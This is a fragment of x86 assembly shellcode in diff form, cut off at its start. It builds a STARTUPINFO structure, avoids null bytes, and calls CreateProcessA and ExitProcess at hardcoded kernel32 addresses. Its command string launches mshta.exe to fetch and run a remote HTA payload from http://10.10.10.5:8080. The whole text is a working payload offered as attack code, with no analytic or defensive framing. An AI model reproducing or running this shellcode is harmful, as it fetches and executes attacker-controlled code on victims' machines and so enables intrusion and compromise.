ebx + loop looper + + ;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo + mov bx, 0x1111 + sub bx, 0x1010 + mov word [esp+0x3c], bx + mov byte [esp+0x10], 0x44 ; cb=0x44 + lea eax, [esp+0x10] ; eax points to StartUpInfo + + ; eax has a pointer to StartUPinfo + ; esp has a pointer to Process_Info containing null values +createprocessA: + push esp ; pointer to Process-Info + push eax ; pointer to StartUpInfo + xor ebx, ebx + push ebx ; null + push ebx ; null + push ebx ; null + inc ebx + push ebx ; bInheritHandles=true + dec ebx + push ebx ; null + push ebx ; null + push edi ; pointer to message db string + push ebx ; null + mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll + call edx + +ExitProcess: + push eax ; createprocessA return in eax + mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll + call edx + +application: + call firststep + message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta" \ No newline at end of file